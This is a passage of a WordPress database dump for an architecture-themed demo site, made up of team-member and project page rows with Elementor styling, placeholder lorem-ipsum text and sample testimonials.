		<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Sarah Albert','','publish','closed','closed','','sarah-albert-2','','','2022-06-15 07:23:20','2022-06-15 07:23:20','',0,'https://demo.ovatheme.com/retirio/?post_type=team&amp;p=1100',0,'team','',0),(4655,1,'2022-06-23 09:27:39','2022-06-23 09:27:39','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','David Cooper','','publish','closed','closed','','david-cooper-2','','','2022-06-23 09:27:39','2022-06-23 09:27:39','',0,'https://demo.ovatheme.com/retirio/?post_type=team&amp;p=2465',0,'team','',0),(4656,1,'2022-06-23 09:28:14','2022-06-23 09:28:14','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									85%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Christine eve','','publish','closed','closed','','christine-eve-2','','','2022-06-23 09:28:14','2022-06-23 09:28:14','',0,'https://demo.ovatheme.com/retirio/?post_type=team&amp;p=2467',0,'team','',0),(4657,1,'2022-06-23 09:28:54','2022-06-23 09:28:54','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									60%\n			<section>\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Mike Hardson','','publish','closed','closed','','mike-hardson-2','','','2022-06-23 09:28:54','2022-06-23 09:28:54','',0,'https://demo.ovatheme.com/retirio/?post_type=team&amp;p=2469',0,'team','',0),(4658,1,'2022-11-14 03:35:41','2022-11-14 03:35:41','','logo-black-1','','inherit','open','closed','','logo-black-1','','','2022-11-14 03:35:41','2022-11-14 03:35:41','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/11/logo-black-1.png',0,'attachment','image/png',0),(4672,1,'2022-11-14 03:47:46','2022-11-14 03:47:46','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-retirio-child-2','','','2022-11-14 03:47:46','2022-11-14 03:47:46','',0,'https://bauhaus.futuremediatrix.com/2022/11/14/wp-global-styles-retirio-child-2/',0,'wp_global_styles','',0),(4673,1,'2022-11-14 03:48:04','2022-11-14 03:48:04','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Project','','inherit','closed','closed','','560-revision-v1','','','2022-11-14 03:48:04','2022-11-14 03:48:04','',560,'https://bauhaus.futuremediatrix.com/?p=4673',0,'revision','',0),(4674,1,'2022-11-14 03:50:17','2022-11-14 03:50:17','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Projects','','inherit','closed','closed','','560-revision-v1','','','2022-11-14 03:50:17','2022-11-14 03:50:17','',560,'https://bauhaus.futuremediatrix.com/?p=4674',0,'revision','',0),(4675,1,'2022-11-14 04:44:01','2022-11-14 03:51:35',' ','','','publish','closed','closed','','4675','','','2022-11-14 04:44:01','2022-11-14 04:44:01','',0,'https://bauhaus.futuremediatrix.com/?p=4675',4,'nav_menu_item','',0),(4680,1,'2022-11-14 03:53:18','2022-11-14 03:53:18','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a 